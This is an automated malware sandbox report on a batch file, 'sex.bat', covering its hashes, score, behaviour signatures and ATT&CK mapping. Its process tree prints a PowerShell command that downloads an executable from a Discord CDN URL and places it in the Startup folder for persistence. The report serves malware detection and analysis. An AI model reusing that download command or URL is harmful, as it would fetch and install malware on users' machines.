68a0b00a775d82cb9bd2db4683cc8dc17fd50c04cddba08e895f2287358ce7b9

Analysis

max time kernel
146s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20-08-2024 12:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.bat
Size

2KB
MD5

90f76a1b035f4918e5c9ae09897830a5
SHA1

8d8583bce8795c503ecc2fdb23bb5f6577d78c73
SHA256

68a0b00a775d82cb9bd2db4683cc8dc17fd50c04cddba08e895f2287358ce7b9
SHA512

f279d8a85360292c2b2387ad09dd545bde2c9c1607b0884fff668d3c4a45fac7d82ddaee1059e2ceb668783895278ad2e1f4442a38a6bba425179f8ef17f4875

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	3560	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3560	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\macro_1.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\macro_1.exe	cmd.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3560	powershell.exe
3560	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3560	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 4560	2280	cmd.exe	86
PID 2280 wrote to memory of 4560	2280	cmd.exe	86
PID 2280 wrote to memory of 3560	2280	cmd.exe	87
PID 2280 wrote to memory of 3560	2280	cmd.exe	87

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sex.bat"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\system32\fsutil.exe
  fsutil dirty query C:
  2⤵
  PID:4560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1262470296091496579/1275421415192924200/macro_1.exe?ex=66c5d441&is=66c482c1&hm=e51c600c7c441b98853dbd95cd25b9125271c63af2812faaea6d17cdb8ef37b2' -OutFile 'C:\Users\Admin\AppData\Local\Temp\macro_1.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2oiu24e.xcb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\macro_1.exe

Filesize
1.1MB

MD5
3db8f6321feca5deef2abedcad7c67b5

SHA1
a093da51d61d6d039586d965d6b362894151e2c2

SHA256
778bf373af67cba808375ce443ccf3aa064d85a62f9320ef799df893b961e46d

SHA512
c0d7062190b82e91c800934bc52f05616c1e41f5fcb0f18e9751762b38848d05f6ff22f194ef2978180a68219e9e37751092c39dff6959dff3d53833debd7057

Download Submit
memory/3560-0-0x00007FFEFDC73000-0x00007FFEFDC75000-memory.dmp

Filesize
8KB

Download
memory/3560-10-0x000001406B440000-0x000001406B462000-memory.dmp

Filesize
136KB

Download
memory/3560-11-0x00007FFEFDC70000-0x00007FFEFE731000-memory.dmp

Filesize
10.8MB

Download
memory/3560-12-0x00007FFEFDC70000-0x00007FFEFE731000-memory.dmp

Filesize
10.8MB

Download
memory/3560-16-0x00007FFEFDC70000-0x00007FFEFE731000-memory.dmp

Filesize
10.8MB

Download